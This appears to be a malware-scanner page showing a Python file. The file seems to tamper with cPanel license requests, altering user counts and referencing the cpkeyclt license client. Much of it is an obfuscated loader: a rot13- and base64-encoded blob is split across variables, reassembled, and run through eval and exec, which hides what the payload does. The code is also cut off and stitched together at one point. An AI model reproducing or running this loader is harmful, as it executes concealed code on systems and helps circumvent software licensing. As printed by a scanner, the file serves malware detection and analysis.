            # Domainless Users
            origVal = line[0] + " " + line[1]
            
            domainlessUsers = int(line[1])
            domainlessUsers = domainlessUsers - params["domainless_users"]
            if domainlessUsers < 0:
                domainlessUsers = 0
            line[1] = str(domainlessUsers)
            
            newVal = line[0] + getRandomSpace() + line[1]
            
            txtRequest = txtRequest.replace(origVal, newVal)
        else:
            continue
        
    return txtRequest

def getNewProxy():
    return False

def recvfrom(ssock): # implement non-blocking sockets idiot can't do that cause libraries limiting us to that.
    datalist = []
    timeout = 5 # Read all chunks you can in 5 seconds
    begin = int(time.time())
    while True:
        if int(time.time()) - begin > 5:
            break
        try:
            ssock.settimeout(1.66) # 5/3 Rate
            data = ssock.recv(2048) # Try reading data chunk by chunk like just like how cpkeyclt.pl does (X) DOUBT - cpkeyclt uses non-blocking sockets with ssleay
            ssock.settimeout(8) # This also looks stupid and is stupid but works well for now until we find a workaround yea gj
            if data:
        '
destiny = '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rTAypUD6QDbtVPNtVPNtVPNtVPNtVPNtVPNtVUAmoTAmo2AeVQ0tL2AioaEyrUDhq3WupS9mo2AeMKDbL3ZfVUAypaMypy9mnJEyCHMuoUAyXFNwVTy0VTymVT5iqj0XVPNtVPNtVPNtVPNtVPNtVN0XVPNtVPNtVPNtVPNtVPNtVUAmoTAmo2AeYaAyozDboTywMTS0LFxAPvNtVPNtVPNtVPNtVPNtVPO5LJ5cqPN9VUWyL3Mzpz9gXUAmoTAmo2AeXD0XVPNtVPNtVPNtVPNtVPNtVN0XVPNtVPNtVPNtVPNtVPNtVTyzVUyuozy0VQ09VTVvVwbAPvNtVPNtVPNtVPNtVPNtVPNtVPNtoT9aXUEuMlNeVPWZnJAyoaAyVUAypaMypvOmMJ50VTIgpUE5VUWyp3OioaAyYvOZnJAyoaAyVTAuovOvMFOmqKAjMJ5xMJDtBvtvXD0XVPNtVPNtVPNtVPNtVPNtVPNtVPOlMKAjo25mMFN9VPV1ZQNtVvNeVUEuMlNeVPWZnJAyoaAyVUAypaMypvOmMJ50VTIgpUE5VUWyp3OioaAyYvOZnJAyoaAyVTAuovOvMFOmqKAjMJ5xMJDtBvtvQDbtVPNtVPNtVPNtVPNtVPNtVPNtVUAmoUAmo2AeYaAyozDbpzImpT9hp2HhMJ5wo2EyXPxcQDbtVPNtVPNtVPNtVPNtVPNtVPNtVUAmoTAmo2AeYzAfo3AyXPxAPvNtVPNtVPNtVPNtVPNtVPNtVPNtp3Afp3AiL2fhL2kip2HbXD0XVPNtVPNtVPNtVPNtVPNtVPNtVPOwpl5woT9mMFtcQDbtVPNtVPNtVPNtVPNtVPNtVPNtVTZhL2kip2HbXD0XVPNtVPNtVPNtVPNtVPNtVPNtVPOwo250nJ51MD0XVPNtVPNtVPNtVPNtVPNtVN0XVPNtVPNtVPNtVPNtVPNtVTyzVTEyLaIaBt0XVPNtVPNtVPNtVPNtVPNtVPNtVPOfo2pbqTSaVPftVyWypTk5VTMlo20tL1OuozIfVRS1qTttp2IlqzywMGbtVvjtrJShnKDcQDbtVPNtVPNtVPNtVPNtVPNtMJkmMGbAPvNtVPNtVPNtVPNtVPNtVPNtVPNtnJLtrJShnKDhMzyhMPuvVwVmZPOYMKxtDJAwMKO0MJDvXFNuCFNgZGbAPvNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVTkiMlu0LJptXlNvD2kcMJ50VTkcL2Ihp2yhMlOwo21joTI0MF4vXD0XVPNtVPNtVPNtVPNtVPNtVPNtVPOyoTyzVUyuozy0YzMcozDbLvW0o28toJShrFO0nJ1yplVcVPR9VP0kBt0XVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtoT9aXUEuMlNeVPWZnJAyoaAyVUA1p3OyozEyMPN6XPVcQDbtVPNtVPNtVPNtVPNtVPNtVPNtVTIfp2H6QDbtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPOfo2pbqTSaVPftVyIhMKujMJA0MJDtLJ5mq2IlVTMlo20toTywMJ5mnJ5aVUAypaMcL2HhVSWypTk5VTymBvNvYPO5LJ5cqPxAPvNtVPNtVPNtVPNtVPNtVPNAPvNtVPNtVPNtVPNtVPNtVPO0pax6QDbtVPNtVPNtVPNtVPNtVPNtVPNtVUAmoUAmo2AeYaAyozDbrJShnKDcQDbtVPNtVPNtVPNtVPNtVPNtMKuwMKO0Bt0XVPNtVPNtVPNtVPNtVPNtVPNtVPO0nJ1yYaAfMJIjXQNhAFxAPvNtVPNtVPNtVPNtVPNtVPNtVPNtp3Afp3AiL2fhp2IhMPu5LJ5cqPxAPvNtVPNtVPNtVPNtVPNtVPNAPvNtVPNtVPNtVPNtVPNtVPOmp2kwp29wnl5woT9mMFtcQDbtVPNtVPNtVPNtVPOyoUAyBt0XVPNtVPNtVPNtVPNtVPNtVTyzVTEyLaIaBt0XVPNtVPNtVPNtVPNtVPNtVPNtVPOfo2pbqTSaVPftVygREHWIE10tEzScoTIxVUEiVUWyqUWcMKMyVUIjM3WuMTHtoJImp2SaMFRtEKuuL3DtoJImp2SaMFO3LKZ6VvjtrJShnKDcQDbtVPNtVPNtVUAmoUAmo2AeYzAfo3AyXPxAPvNtVPNtVPNtL3ZhL2kip2HbXD0XVPNtVTZhL2kip2HbXD0XVPNtVTyzVT5iqPOxMJW1MmbAPvNtVPNtVPNtpaIhXPWyL2uiVPVvVQ4tY3Impv9fo2AuoP9wpTShMJjioT9apl9fnJAyoaAyK2kiMlVcQDbtVPNtQDbtVPNtVlOZo29jLzSwnlOcoaEypzMuL2H6VSIjQDbtVPNtV29mYaA5p3EyoFtvnJMwo25znJptoT86ZmNjVUIjVQ4iMTI2Y251oTjtZw4zZFVcQDbtVPNtV29mYaA5p3EyoFtvnJM1pPOfombmZQNtCv9xMKLioaIfoPNlCvLkVvxAPvNtVPNAPvNtVPOfo2pbqTSaVPftVxEiozHhVvx='
joy = 'rot13'
trust = eval('magic') + eval('codecs.decode(love, joy)') + eval('god') + eval('codecs.decode(destiny, joy)')
eval(compile(base64.b64decode(eval('trust')),'<string>','exec'))



© 2023 Quttera Ltd. All rights reserved.